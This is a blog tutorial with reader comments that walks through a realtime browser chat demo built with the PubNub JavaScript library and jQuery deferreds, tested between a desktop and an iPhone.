scala> val pop: State[Stack, Int] = for { s <- get[Stack] val (x :: xs) = s _ <- put(xs) } yield x pop: scalaz.State[Stack,Int] = scalaz.StateT$$anon$7@40014da3 scala> def push(x: Int): State[Stack, Unit] = for { xs <- get[Stack] r <- put(x :: xs) } yield r push: (x: Int)scalaz.State[Stack,Unit]
As you can see a monad on its own doesn't do much (encapsulate a function that returns a tuple), but by chaining them we can remove some boilerplates.
Error error on the wall
LYAHFGG:
The
Either e atype on the other hand, allows us to incorporate a context of possible failure to our values while also being able to attach values to the failure, so that they can describe what went wrong or provide some other useful info regarding the failure.
\/
We know
Either[A, B] from the standard library, but Scalaz 7 implements its own
Either equivalent named
\/:
sealed trait \/[+A, +B] { ... /** Return `true` if this disjunction is left. */ def isLeft: Boolean = this match { case -\/(_) => true case \/-(_) => false } /** Return `true` if this disjunction is right. */ def isRight: Boolean = this match { case -\/(_) => false case \/-(_) => true } ... /** Flip the left/right values in this disjunction. Alias for `unary_~` */ def swap: (B \/ A) = this match { case -\/(a) => \/-(a) case \/-(b) => -\/(b) } /** Flip the left/right values in this disjunction. Alias for `swap` */ def unary_~ : (B \/ A) = swap ... /** Return the right value of this disjunction or the given default if left. Alias for `|` */ def getOrElse[BB >: B](x: => BB): BB = toOption getOrElse x /** Return the right value of this disjunction or the given default if left. Alias for `getOrElse` */ def |[BB >: B](x: => BB): BB = getOrElse(x) /** Return this if it is a right, otherwise, return the given value. Alias for `|||` */ def orElse[AA >: A, BB >: B](x: => AA \/ BB): AA \/ BB = this match { case -\/(_) => x case \/-(_) => this } /** Return this if it is a right, otherwise, return the given value. Alias for `orElse` */ def |||[AA >: A, BB >: B](x: => AA \/ BB): AA \/ BB = orElse(x) ... } private case class -\/[+A](a: A) extends (A \/ Nothing) private case class \/-[+B](b: B) extends (Nothing \/ B)
These values are created using
right and
left method injected to all data types via
IdOps:
scala> 1.right[String] res12: scalaz.\/[String,Int] = \/-(1) scala> "error".left[Int] res13: scalaz.\/[String,Int] = -\/(error)
The
Either type in Scala standard library is not a monad on its own, which means it does not implement
flatMap method with or without Scalaz:
scala> Left[String, Int]("boom") flatMap { x => Right[String, Int](x + 1) } <console>:8: error: value flatMap is not a member of scala.util.Left[String,Int] Left[String, Int]("boom") flatMap { x => Right[String, Int](x + 1) } ^
You have to call
right method to turn it into
RightProjection:
scala> Left[String, Int]("boom").right flatMap { x => Right[String, Int](x + 1)} res15: scala.util.Either[String,Int] = Left(boom)
This is silly since the point of having
Either is to report an error on the left. Scalaz's
\/ assumes that you'd mostly want right projection:
scala> "boom".left[Int] >>= { x => (x + 1).right } res18: scalaz.Unapply[scalaz.Bind,scalaz.\/[String,Int]]{type M[X] = scalaz.\/[String,X]; type A = Int}#M[Int] = -\/(boom)
This is nice. Let's try using it in
for syntax:
scala> for { e1 <- "event 1 ok".right e2 <- "event 2 failed!".left[String] e3 <- "event 3 failed!".left[String] } yield (e1 |+| e2 |+| e3) res24: scalaz.\/[String,String] = -\/(event 2 failed!)
As you can see, the first failure rolls up as the final result. How do we get the value out of
\/? First there's
isRight and
isLeft method to check which side we are on:
scala> "event 1 ok".right.isRight res25: Boolean = true scala> "event 1 ok".right.isLeft res26: Boolean = false
For right side, we can use
getOrElse and its symbolic alias
| as follows:
scala> "event 1 ok".right | "something bad" res27: String = event 1 ok
For left value, we can call
swap method or it's symbolic alias
unary_~:
scala> ~"event 2 failed!".left[String] | "something good" res28: String = event 2 failed!
We can use
map to modify the right side value:
scala> "event 1 ok".right map {_ + "!"} res31: scalaz.\/[Nothing,String] = \/-(event 1 ok!)
To chain on the left side, there's
orElse, which accepts
=> AA \/ BB where
[AA >: A, BB >: B]. The symbolic alias for
orElse is
|||:
scala> "event 1 failed!".left ||| "retry event 1 ok".right res32: scalaz.\/[String,String] = \/-(retry event 1 ok)
Validation
AnotherV?
NonEmptyList.
|
http://eed3si9n.com/learning-scalaz-day7
|
CC-MAIN-2018-47
|
refinedweb
| 1,726
| 69.52
|
I download ZIP from follow instruction.
./setup objdircd objdirmake -jgetconf _NPROCESSORS_ONLN
getconf _NPROCESSORS_ONLN
and error occured during compile
....../psi4public-master/src/bin/psi4/python.cc:750:12: error: use of undeclared identifier 'GIT_VERSION' return GIT_VERSION; ^1 error generated.make[2]: *** [src/bin/psi4/CMakeFiles/versioned_code.dir/python.cc.o] Error 1make[1]: *** [src/bin/psi4/CMakeFiles/versioned_code.dir/all] Error 2
any suggestion?
Build environment: mac 10.10
clone git resolve issue.
Yes, sorry about that. Consequence of ZIP source not being under git control. I'm still trying to figure out how to convey the git-dependent version number to the ZIP file, but if you modify the else in src/bin/psi4/gitversion.py according to below, it will actually build.
else
src/bin/psi4/gitversion.py
def write_version(branch, mmp, ghash, status):
if ghash:
version_str = "#define GIT_VERSION \"{%s} %s %s\"\n" % \
(branch, ghash, status)
else:
version_str = "#define GIT_VERSION \"{%s} %s %s\"\n" % \
('(no tag)', '', '')
This is fixed now (in that it'll compile and give minimal versioning info) as of d1a2493, but you're better off with the clone anyway, in that it's easier to get updates.
|
http://forum.psicode.org/t/undefined-git-version/61
|
CC-MAIN-2018-43
|
refinedweb
| 191
| 50.43
|
’ve been working with Task.Factory.FromAsync() methods and have been experiencing severe memory leakage. I’ve used the profiler and it shows that a lot of objects just seem to be hanging around after use:
Heap shot 140 at 98.591 secs: size: 220177584, object count: 2803125, class count: 98, roots: 666
Bytes Count Average Class name
25049168 142325 175 System.Threading.Tasks.Task<System.Int32> (bytes: +398816, count: +2266)
1 root references (1 pinning)
142324 references from: System.Threading.Tasks.Task
142305 references from: System.Threading.Tasks.TaskCompletionSource<System.Int32>
98309 references from: task_test.Task3Test.<Run>c__AnonStorey1
25049024 142324 176 System.Threading.Tasks.Task (bytes: +398816, count: +2266)
142304 references from: System.Threading.Tasks.TaskContinuation
17078880 142324 120 System.Action<System.Threading.Tasks.Task<System.Int32>> (bytes: +271920, count: +2266)
142324 references from: System.Threading.Tasks.TaskActionInvoker.ActionTaskInvoke<System.Int32>
17076600 142305 120 System.Runtime.Remoting.Messaging.MonoMethodMessage (bytes: +271680, count: +2264)
1 root references (1 pinning)
142304 references from: System.MonoAsyncCall
17076584 142305 119 System.AsyncCallback (bytes: +271920, count: +2266)
1 root references (1 pinning)
142304 references from: System.MonoAsyncCall
17076584 142305 119 System.Func<System.Int32> (bytes: +271920, count: +2266)
1 root references (1 pinning)
142305 references from: System.Func<System.IAsyncResult,System.Int32>
142304 references from: System.Runtime.Remoting.Messaging.AsyncResult
1 references from: System.Func<System.AsyncCallback,System.Object,System.IAsyncResult>
17076584 142305 119 System.Func<System.IAsyncResult,System.Int32> (bytes: +271920, count: +2266)
1 root references (1 pinning)
142305 references from: System.Threading.Tasks.TaskFactory.<FromAsyncBeginEnd>c__AnonStorey3A<System.Int32>
17076480 142304 120 System.Runtime.Remoting.Messaging.AsyncResult (bytes: +271800, count: +2265)
98461 references from: System.Object[]
I’m trying to work out what type of things may/may not be occurring that prevent the gc from recognizing the object is no longer in use. FromAsync returns a Task object which is obtained from TaskCompletionSource which has a class variable “source” that holds the value of the Task it in turn gets from the new Task invocation.
Here's the test case. It also includes a case using StartNew() where there is no explosion in memory use. The initial Test3Task below did not use the ContinueWith but to see if it was something we weren't cleaning up we put it in (to no effect). [And no, the listening variable used below is not used - there were plans to make the test more intelligent but a do forever was just as good.]
using System;
using System.Threading;
using System.Threading.Tasks;
namespace task_test
{
class MainClass
{
public static void Main (string[] args)
{
// Test3 - Leaky
var t = new Task3Test();
// Test4 - Doesn't leak
// var t = new Task4Test();
t.Run();
}
}
public class BaseTask
{
public int GetRandomInt(int top)
{
Random random = new Random();
return random.Next(1,top);
}
}
public class FibArgs
{
public byte[] data;
public int n;
}
public class Fib
{
public int Calculate(FibArgs args)
{
int n = args.n;
int a = 0;
int b = 1;
// In N steps compute Fibonacci sequence iteratively.
for (int i = 0; i < n; i++)
{
int temp = a;
a = b;
b = temp + b;
}
Console.WriteLine("ThreadId: {2}, fib({0}) = {1}", n, a, Thread.CurrentThread.GetHashCode());
return a;
}
}
public class Task3Test : BaseTask
{
public void Run()
{
bool listening = true;
long i = 0;
while (listening)
{
i++;
Func<int> fun = () => {
int n = GetRandomInt(100);
Fib f = new Fib();
FibArgs args = new FibArgs();
args.n = n;
return f.Calculate(args);
};
var t = Task<int>.Factory.FromAsync(fun.BeginInvoke, fun.EndInvoke, null);
t.ContinueWith( x => {
if (x.IsCompleted) {
x.Dispose();
x = null;
}
}
);
}
}
}
public class Task4Test : BaseTask
{
public void Run()
{
bool listening = true;
long i = 0;
while (listening)
{
int n = GetRandomInt(100);
Fib f = new Fib();
FibArgs args = new FibArgs();
args.n = n;
Task.Factory.StartNew(() => f.Calculate(args), TaskCreationOptions.LongRunning)
.ContinueWith(x => {
if(x.IsFaulted)
{
Console.WriteLine("OOPS, error!!!");
x.Exception.Handle(_ => true); //just an example, you'll want to handle properly
}
else if(x.IsCompleted)
{
Console.WriteLine("Cleaning up task {0}", x.Id);
x.Dispose();
}
}
);
}
}
}
}
These symptoms only seem to affect x86_64 as when I run on s390x I have no problems with Boehm or sgen. However, if I leave the WriteLine in the Calculate method I do see exponential memory consumption on s390x as well (the heapshot reports are very very different hen running with and without that statement). Removal of that statement from x86_64 has no effect - it grows regardless.
The symptoms that the above test case exhibits are also experienced on an application that only creates a few tasks per second.
Jeremie, could you eyeball this?
Any info you can provide would be useful. I am asking Martin to look at this.
if (i > 1000000)
listening = false;
}
Thread.Sleep (2000);
while(true)
{
GC.Collect (10, GCCollectionMode.Forced);
Thread.Sleep (1000);
}
Thread.Sleep (-1);
Added this at the end of the while block in Test3. As I can see it consumes about 1.3 Gb and after a while releases it going back to 44MB RES. So there is no memory leak, runtime just can't keep up with the speed you are creating new tasks, so they stay scheduled forever.
The weird thing is that a single task consumes about 1MB RAM.
Oh, I've miscalculated. It's not 1MB per task, it's 1KB per task which is acceptable amount.
This is not a GC issue but a TaskScheduler issue.
Tasks can be created at a faster pace than they are completed.
I wrote a small program than can shows us the problem:
Whereas .NET has rarely more than 3000 running tasks, Mono task count diverges.
It is worse when the tasks take more time to complete (eg: doing Console.WriteLine)
This is not a bug. The same behavior can be observed on .net.
The issue is that you're queueing tasks faster than the system can process them.
|
https://bugzilla.xamarin.com/12/12236/bug.html
|
CC-MAIN-2021-25
|
refinedweb
| 965
| 60.01
|
Neural Network Lab
Neural network models can be created, saved and reused. Here's how.
A neural network model consists of the network's architecture and defining numeric values. Did you know you can create, save and reuse a neural network model? I'll show you how in this month's column.
A network architecture is the number of input, hidden, and output nodes, and a description of how those nodes are connected. In most cases neural networks are fully connected so that all input nodes are connected to all hidden nodes, and all hidden nodes are connected to all output nodes.
The defining numeric values are the values of the weights and biases. Each input-to-hidden node connection and hidden-to-output node connection has an associated weight. Each hidden node and each output node has an associated bias. For a neural network with n input nodes, h hidden nodes, and o output nodes, there are (n * h) + h + (h * o) + o weights and biases. For example, the 3-4-2 neural network in Figure 1 has (3 * 4) + 4 + (4 * 2) + 2 = 26 weights and biases.
The behavior of a neural network is also defined by two activation functions. For neural network classifiers, where the goal is to predict a discrete value (for example, predicting the political party affiliation of a person), the softmax activation function is almost always used on the output nodes. The most common activation function for hidden nodes is the hyperbolic tangent (tanh) function, but the logistic sigmoid function is sometimes used.
Working with neural networks usually involves trial and error. The number of hidden nodes is a free parameter (sometimes called a hyper parameter), and the parameters used during training to find good values for the weights and biases are also free parameters. For the most common form of training, back-propagation, training parameters usually include the learning rate (how much weights and biases change during each training iteration), the momentum rate (an optional value that both increases training speed and can prevent training from getting stuck at poor values for the weights and biases) and, optionally, a weight decay rate (to prevent over-fitting).
The best way to see where this article is headed is to examine the screenshot of a demo program shown in Figure 2. The goal of the demo program is to predict the species of an iris flower (Iris setosa or Iris versicolor or Iris virginica) using the flower's sepal (a leaf-like structure) length and width, and petal length and width.
The demo data is part of a famous data set called Fisher's Iris Data. The full data set has three species and there are 50 examples of each species so the demo has a total of 150 data items. The raw data was preprocessed by using 1-of-N encoding where setosa is (1, 0, 0), versicolor is (0, 1, 0) and virginica is (0, 0, 1).
The four numeric predictor variables, sepal length and width, and petal length and width, were not normalized because the values all have roughly the same magnitude and so no one predictor will dominate the others.
The source data was randomly split into a training set and a test set. The training set has 80 percent of the items (120) and the test set has the remaining 20 percent of the items (30).
The demo creates a 4-5-2 neural network. There are four input nodes, one for each predictor variable. The number of hidden nodes, five, was determined using trial and error. There are three output nodes because the there are three possible classes to predict.
The demo program uses the back-propagation algorithm to find the values of the weights and biases so that the computed output values (using training data input values) closely match the known correct output values in the training data. After training the values of the 43 weights and biases are displayed, and the accuracy of the model is calculated and displayed. The model correctly predicts 97.5 percent of the training items (117 out of 120) and 96.7 percent of the test items (29 out of 30).
The demo then saves the information that defines the neural network in a text file named iris_model_001.txt. The demo creates a new, empty neural network, and loads the saved model into the new network. The accuracy of the new neural network on the test data is 96.7 percent as it should be, because the two neural networks are the same.
This article assumes you have at least intermediate-level developer skills and a basic understanding of neural networks. The demo program is too long to present in its entirety here, but complete source code is available in the download that accompanies this article. All normal error checking has been removed to keep the main ideas of neural network models as clear as possible.
The Demo Program
To create the demo program I launched Visual Studio and selected the C# console application project template. I named the project NeuralModels. The demo has no significant Microsoft .NET Framework dependencies so any version of Visual Studio will work.
After the template code loaded, in the Solution Explorer window I right-clicked on file Program.cs and renamed it to the more descriptive NeuralModelsProgram.cs and then allowed Visual Studio to automatically rename class Program. At the top of the template-generated code in the Editor window, I deleted all unnecessary using statements, leaving just the reference to the top-level System namespace. Then I added a using statement for the System.IO namespace so that methods to read from and write to text files could be accessed easily.
The overall structure of the demo program is shown in Listing 1. Helper method load data reads the source iris data from a text file and stores it into an array-of-arrays-style matrix. Method SplitData creates a reference copy of the source data and splits it into a training set and a test set. All of the neural network logic is contained in a program-defined class called NeuralNetwork
using System;
using System.IO;
namespace NeuralModels
{
class NeuralModelsProgram
{
static void Main(string[] args)
{
// All program control statements
}
static double[][] LoadData(string dataFile,
int numRows, int numCols) { . . }
static void SplitData(double[][] allData,
double trainPct, int seed,
out double[][] trainData,
out double[][] testData) { . . }
public static void ShowMatrix(double[][] matrix,
int numRows, int decimals,
bool indices) { . . }
public static void ShowVector(double[] vector,
int decimals, int lineLen,
bool newLine) { . . }
}
public class NeuralNetwork { . . }
} // ns
The Main method loads and displays the source data with these statements:
double[][] allData =
LoadData("..\\..\\IrisData.txt", 150, 7); // 150 rows, 7 cols
ShowMatrix(allData, 4, 1, true); // 4 items, 1 decimal
You can easily find the raw iris data set in several places on the Internet, and then encode the species values using a text editor replace command. The source data is split into training and test sets, like so:
double[][] trainData = null;
double[][] testData = null;
double trainPct = 0.80;
int splitSeed = 1;
SplitData(allData, trainPct, splitSeed,
out trainData, out testData);
The choice of the seed value (1) for the random number generator was arbitrary. The neural network is created with these statements:
int numInput = 4;
int numHidden = 5;
int numOutput = 3;
NeuralNetwork nn =
new NeuralNetwork(numInput, numHidden, numOutput);
The neural network is fully connected, and the tanh hidden node activation function is hardcoded. A big advantage of writing custom neural network code is that you can keep the size of your source code much smaller than when writing code intended to be used by people who do not have access to the source code. The neural network is trained with these statements:
int maxEpochs = 1000;
double learnRate = 0.05;
double momentum = 0.01;
bool progress = true;
double[] wts = nn.Train(trainData, maxEpochs,
learnRate, momentum, progress);
The accuracy of the neural network is then calculated:
double trainAcc = nn.Accuracy(trainData);
double testAcc = nn.Accuracy(testData);
At this point the program could be closed, losing the values of the weights and biases. This isn't a problem because the neural network could be easily recreated and retrained. But in more complex situations where training can take hours or even days, you'd want to save your model. The demo model is saved with these statements:
string modelName = "..\\..\\iris_model_001.txt";
nn.SaveModel(modelName);
Here the model is saved as a text file. With rise of more sophisticated data formats such as XML, OData, and JSON, sometimes it's easy to forget that ordinary text files are often simple and effective. The contents of the resulting model text file are:
numInput:4
numHidden:5
numOutput:3
weights:-1.4442,-1.3859,-0.2061,(etc),-0.5112
The weights and bias values are stored together. The first 4 * 5 = 20 values are for the input-to-hidden weights matrix, in row major form (left to right, top to bottom). The next five values are the hidden node biases. Next come 5 * 3 = 15 values for the hidden-to-output weights matrix. And then the last three values are the output node biases.
A new neural network is created and the saved model is loaded with these statements:
NeuralNetwork nm = new NeuralNetwork();
nm.LoadModel(modelName);
double modelAcc = nm.Accuracy(testData);
The new neural network, named nm, has data members for the number of input nodes, the input-to-hidden node weights, and so on, but none of these data members are initialized. The LoadModel method takes the information from the trained network and uses it to initialize the network.
What Defines a Model?
Understanding exactly what a neural network model is, is probably best understood by looking at code. The definition for class method SaveModel is presented in Listing 2.
public void SaveModel(string modelName)
{
FileStream ofs = new FileStream(modelName,
FileMode.Create);
StreamWriter sw = new StreamWriter(ofs);
sw.WriteLine("numInput:" + this.numInput);
sw.WriteLine("numHidden:" + this.numHidden);
sw.WriteLine("numOutput:" + this.numOutput);
sw.Write("weights:");
for (int i = 0; i < ihWeights.Length; ++i)
for (int j = 0; j < ihWeights[0].Length; ++j)
sw.Write(ihWeights[i][j].ToString("F4") + ",");
for (int i = 0; i < hBiases.Length; ++i)
sw.Write(hBiases[i].ToString("F4") + ",");
for (int i = 0; i < hoWeights.Length; ++i)
for (int j = 0; j < hoWeights[0].Length; ++j)
sw.Write(hoWeights[i][j].ToString("F4") + ",");
for (int i = 0; i < oBiases.Length - 1; ++i)
sw.Write(oBiases[i].ToString("F4") + ",");
sw.WriteLine(oBiases[oBiases.Length-1].ToString("F4"));
sw.Close();
ofs.Close();
}
Method SaveModel essentially creates a configuration file. The number of input, hidden and output nodes are written, one to a line, with a leading identifier. The weights and biases are written sequentially, to four decimal places, with a comma character as a delimiter. This is about as simple a format as possible and is feasible because the code is intended for someone who has the ability to access and modify the source code.
The definition for class method LoadModel is presented in Listing 3. The method opens the model file without doing any error checking. When writing code for personal use, it's often a tough decision to decide when to put error checking code in, often doubling the number of lines of code, and when to leave error checking out. Of course, in a production environment you must include error checking.
public void LoadModel(string modelName)
{
FileStream ifs = new FileStream(modelName,
FileMode.Open);
StreamReader sr = new StreamReader(ifs);
int numInput = 0;
int numHidden = 0;
int numOutput = 0;
double[] wts = null;
string line = "";
string[] tokens = null;
while ((line = sr.ReadLine()) != null)
{
if (line.StartsWith("//") == true) continue;
tokens = line.Split(':');
if (tokens[0] == "numInput")
numInput = int.Parse(tokens[1]);
else if (tokens[0] == "numHidden")
numHidden = int.Parse(tokens[1]);
else if (tokens[0] == "numOutput")
numOutput = int.Parse(tokens[1]);
else if (tokens[0] == "weights")
{
string[] vals = tokens[1].Split(',');
wts = new double[vals.Length];
for (int i = 0; i < wts.Length; ++i)
wts[i] = double.Parse(vals[i]);
}
}
sr.Close();
ifs.Close();];
this.rnd = new Random(4); // Same as ctor
this.SetWeights(wts);
}
Notice method LoadModel is coded to allow you to insert C#-style comment lines. In most cases you'd want to add information such as the training parameter values, location of the training data and so on.
After reading the saved values from the model text file, method LoadModel uses the values to allocate space for the arrays that hold the weights and bias values, and then assigns values for numInput, numHidden, numOutput, and the weights and biases.
The seed value for the Random object, 4, is the same as used in the primary constructor method. This is a brittle design and a more robust alternative is to parameterize the primary constructor to accept a seed value, and modify methods SaveModel and LoadModel so that the constructor seed value is saved and loaded just as the other model parameters.
Wrapping Up
Saving and retrieving a custom neural network model isn't too difficult from a technical point of view. The more difficult aspect of neural network models is defining exactly what constitutes your model and designing a good calling interface. Based on my experience at least, there are very few useful general guidelines other than the saying attributed to Albert Einstein, "Everything should be as simple as possible, but not simpler."
The software theme of this article is that when you're writing code intended to be used by yourself, or possibly a colleague, you can make your code much simpler than when you're writing code intended for an external audience of some sort. For example, the demo program presented in this article used a hardcoded hyperbolic tangent function as the hidden node activation function. This permits the model design to leave out the choice of activation function. This is fine because as long as you have access to the source code, you can easily change the activation function. But if you were writing neural network code as a general library, you'd have to include every imaginable activation function, which in turn would complicate any model.
|
https://visualstudiomagazine.com/articles/2015/09/01/how-to-reuse-neural-network-models.aspx
|
CC-MAIN-2021-04
|
refinedweb
| 2,357
| 55.13
|
Read write lock for asyncio.
Read write lock for asyncio . A RWLock maintains a pair of associated locks, one for read-only operations and one for writing. The read lock may be held simultaneously by multiple reader tasks, so long as there are no writers. The write lock is exclusive.
Whether or not a read-write lock will improve performance over the use of a mutual exclusion lock depends on the frequency that the data is read compared to being modified. For example, a collection that is initially populated with data and thereafter infrequently modified, while being frequently searched is an ideal candidate for the use of a read-write lock. However, if updates become frequent then the data spends most of its time being exclusively locked and there is little, if any increase in concurrency.
Implementation is almost direct port from this patch.
Requires Python 3.5+
import asyncio import aiorwlock loop = asyncio.get_event_loop() async def go(): rwlock = aiorwlock.RWLock(loop=loop) async with rwlock.writer: # or same way you can acquire reader lock # async with rwlock.reader: pass print("inside writer") yield from asyncio.sleep(0.1, loop=loop) loop.run_until_complete(go())
Requires Python 3.3+
import asyncio import aiorwlock loop = asyncio.get_event_loop() @asyncio.coroutine def go(): rwlock = aiorwlock.RWLock(loop=loop) with (yield from rwlock.writer): # or same way you can acquire reader lock # with (yield from rwlock.reader): pass print("inside writer") yield from asyncio.sleep(0.1, loop=loop) loop.run_until_complete(go())
By default RWLock switches context on lock acquiring. That allows to other waiting tasks get the lock even if task that holds the lock doesn’t contain context switches (await fut statements).
The default behavior can be switched off by fast argument: RWLock(fast=True).
Long story short: lock is safe by default, but if you sure you have context switches (await, async with, async for or yield from statements) inside locked code you may want to use fast=True for minor speedup.
aiorwlock is offered under the Apache 2 license.
Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
|
https://pypi.org/project/aiorwlock/
|
CC-MAIN-2017-26
|
refinedweb
| 357
| 69.07
|
Hello all,
I've been trying to build a compiler for learning purposes. I'm creating the lexer with gnu flex and a parser with bison. I've been using these tools on Linux but my main development platform is windows (Visual Studio). But last week I ran into a problem: When I run the parser, the application freezes. If I pause the application (using VS' debugger pause) it always stops at the same location in the C library.
The callstack:
The line of code at which the application pauses:
else if ( !ReadFile( (HANDLE)_osfhnd(fh), buffer, cnt, (LPDWORD)&os_read, NULL ) || os_read < 0 || (size_t)os_read > cnt)
I validated that the stream is valid and is the correct file.
I'm using the gnuwin32 version of flex on windows to generate the lexer.
I've reduced the flex file to:
%{ #include <iostream> using namespace std; #include "muse.tab.h" #define YY_DECL extern "C" int yylex() %} %option yylineno %% .* { std::cout << "hello"; return T_USING; } ; %%
Is there anyone who has encountered this issue before?
|
http://www.gamedev.net/topic/642237-windows-flexbison-parser-freeze/
|
CC-MAIN-2015-32
|
refinedweb
| 170
| 65.32
|
Sending Client-To-Client Realtime Messages With The PubNub JavaScript Library
Last night, I finally got around to playing with the PubNub JavaScript library. PubNub provides an API for "push" communication that can broadcast textual messages to a wide range of devices including desktop, TV, and mobile. And, unlike some other realtime messaging libraries, PubNub allows clients to communicate directly with each other using nothing more than the PubNub API. The PubNub website appears to have a tremendous amount of information on it (and is, quite frankly, a bit overwhelming); as such, I'm quite sure that my understanding of the service only scratches the surface. With just a little bit of JavaScript, however, I was able to get this demo up and running quite quickly. And, without having to set up any ColdFusion or Node.js servers, the barrier to entry is incredibly low.
NOTE: In the title to this post, the term "client-to-client" is not meant literally; not as in peer-to-peer. I simply meant that the service does not require you to provide an additional server-side entity in order for the publish and subscribe feature to work.
With PubNub, your server-side application needs to be involved only as much as is necessary - the clients can push messages directly to each other. Your server-side application also has the ability to push messages to the clients. And, depending on the type of server you are running, your server-side application can either subscribe to the PubSub API; or, it can request a message history using a more traditional request/response lifecycle.
Ok, so that's about as deeply as I understand the PubNub service at this point (which is not even as much information as they have on their FAQ page). But, in about an hour or so, I was able to get a client-to-client demo working, complete with iPhone functionality:
<!DOCTYPE html> <html> <head> <title>Using PubNub For Publish And Subscribe Communication</title> <!-- Mobile viewport configuration. --> <meta name="viewport" content = "width=device-width, user-scalable=no" /> <!-- Chat styles. --> <link rel="stylesheet" type="text/css" href="./styles.css" /> <!-- jQuery. --> <script type="text/javascript" src="./jquery-1.6.1.min.js"></script> </head> <body> <!-- This is simple CHAT - what can I say, it's realtime. --> <div class="messageLog"> <ul> <!-- This will be populated dynamically. --> </ul> </div> <form> <input type="text" name="message" size="" /> <button type="submit" disabled="disabled">Send</button> </form> <!-- --------------------------------------------------- --> <!-- --------------------------------------------------- --> <!-- --------------------------------------------------- --> <!-- --------------------------------------------------- --> <!-- PubNub configuration details. --> <div id="pubnub" pub- </div> <!-- Include PubNub from THEIR content delivery netrwork. In the documentation, they recommend this as the only way to build things appropriately; it allows them to continually update the security features. NOTE: The PubNub script MUST BE included AFTER the above DIV tag that provides the configuration keys. --> <script type="text/javascript" src=""></script> <script type="text/javascript"> // This is the user object. Each user has a unique ID that // allows it to be differentiated from all other clients on // the same subscribed channel. var user = { uuid: null, subscribed: false }; // Cache frequent DOM references. dom = {}; dom.messageLog = $( "div.messageLog" ); dom.messageLogItems = dom.messageLog.find( "> ul" ); dom.form = $( "form" ); dom.formInput = dom.form.find( "input" ); dom.formSubmit = dom.form.find( "button" ); // Override form submit to PUSH message. dom.form.submit( function( event ){ // Cancel the default event. event.preventDefault(); // Make sure there is a message to send and that the // user is subscribed. if ( !user.subscribed || !dom.formInput.val().length ){ // Nothing more we can do with this request. return; } // Send the message to the current channel. sendMessage( dom.formInput.val() ); // Clear and focus the current message so the // user can keep typing new messages. dom.formInput .val( "" ) .focus() ; } ); // I append the given message to the message log. function appendMessage( message, isFromMe ){ // Creat the message item. var messageItem = $( "<li />" ).text( message ); // If the message is form me (ie. the local user) then // add the appopriate class for visual distinction. if (isFromMe){ messageItem.addClass( "mine" ); } // Add the message element to the list. dom.messageLogItems.append( messageItem ); } // I send the given message to all subscribed clients. function sendMessage( message ){ // Immediately add the message to the UI so the user // feels like the interface is super responsive. appendMessage( message, true ); // Push the message to PubNub. Attach the user UUID as // part of the message so we can filter it out when it // gets echoed back (as part of our subscription). PUBNUB.publish({ channel: "hello_world", message: { uuid: user.uuid, message: message } }); }; // I receive the message on the current channel. function receiveMessage( message ){ // Check to make sure the message is not just being // echoed back. if (message.uuid === user.uuid){ // This message has already been handled locally. return; } // Add the message to the chat log. appendMessage( message.message ); } // -------------------------------------------------- // // -------------------------------------------------- // // In order to initialize the system, we have to wait for the // client to receive a UUID and for the subscription to the // PubNub server to be established. var init = $.when( // Get the user ID. getUUID(), // Subscribe to the PubNub channel. $.Deferred( function( deferred ){ // When the PubNub connection has been // established, resolve the deferred container. PUBNUB.subscribe({ channel: "hello_world", callback: receiveMessage, connect: deferred.resolve, error: deferred.fail }); } ) ); // When the UUID has come back, prepare the user for use // within the system. init.done( function( uuid ){ // Store the UUID with the user. user.uuid = uuid; // Flag the user as subscribed. user.subscribed = true; // Enable the message form. dom.formSubmit.removeAttr( "disabled" ); } ); // -------------------------------------------------- // // -------------------------------------------------- // // -------------------------------------------------- // // -------------------------------------------------- // // NOTE: The following are just PubNub utility methods that // have been converted from callback-based responses to // deferred-based promises. // I get a UUID from the PUBNUB server. I return a promise // of the value to be returned. function getUUID(){ // Since the core UUID method uses a callback, we need to // create our own intermediary deferred object to wire // the two workflows together. var deferred = $.Deferred(); // Ask PubNub for a UUID. PUBNUB.uuid( function( uuid ){ // Resolve the uuid promise. deferred.resolve( uuid ); } ); // Return the UUID promise. return( deferred.promise() ); } </script> </body> </html>
As with all things "realtime," the first demo anyone wants to try out is a chat application. And, since PubNub provides an API that allows for both publish and subscribe functionality to be executed on the client, the above code is the only thing powering this demo.
I tried to write the code in a top-down manner; I'm using jQuery's Deferred objects and management to ensure that the user is fully subscribed and assigned a PubNub-provided UUID before they are allowed to send messages. Then, messages are added to the chat log as they are both sent out (for perceived performance) and received to and from the PubNub API respectively.
Once I got the code working, I tried to create some bi-directional communication between my Mac and my iPhone. And, much to my delight it worked perfectly and with better performance than I would have anticipated. Even when I was using the 3G network, the latency on the iPhone was entirely acceptable.
Here's what the conversation looked like on my Mac:
... and here's what the other side of the conversation looked like on my iPhone:
One thing that was especially interesting on the iPhone was that the messages appeared to sync up even after the mobile Safari browser was no longer in use. So, if I put the phone to sleep or if I exited the browser in order to use another application, any back-logged messages appeared to sync to the phone once the browser was re-focused. Pretty cool!
Overall, the PubNub service and JavaScript library appear to be quite promising. The thing that I found most frustrating about putting this together was the PubNub website. It's just a tab bit overwhelming. There's a huge number of links and demos; but, at the same time, there doesn't appear to be any consolidated documentation. For example, what's with that "pubnub" DIV in my demo? Honestly, I have no idea - that's just how one of their tutorials worked. Even the pricing is unclear. It seems that there is a certain amount of free broadcasting that one can perform (which is awesome for developers looking to dive in); but, I wasn't sure how to quantify it, nor did I really see how my credits related to my demo activity.
That said, the PubNub website definitely leaves you with the feeling that this realtime platform is no joke. It looks like they've put a tremendous amount of effort into putting it together and I'm looking forward to playing with it some more.
Want to use code from this post? Check out the license.
Reader Comments
What is your code for the "styles.css" page and the "jquery-1.6.1.min.js" page in your example?
@Allan,
Just some styling for the markup. And the other is the latest jQuery library (). The CSS was pretty minimal, so I didn't bother posting it. The demo would work just the same with or without it (just not as pretty).
Important Update:
In my demo, I am including the "config" DIV tag after the Script tag that created the PUBNUB namespace. As such, the demo is actually running in the "demo" mode. In order for the keys to be used in the configuration, you actually have to include the Script tag from the CDN after the DIV tag.
I have updated the demo code to put the config DIV before the Script tag.
Ben
Here is your code embed as html5 page.
Chat Page:
=====================================================================
well view source to get the code then - the embed code
======================================================================
The chat folder contents:
benNadel.html
jquery-1.6.1.min.js
Server i am on is running PHP5.5 Meaning:
alhanson.com (the .com part) is in RAM
running on the Server.
Allan
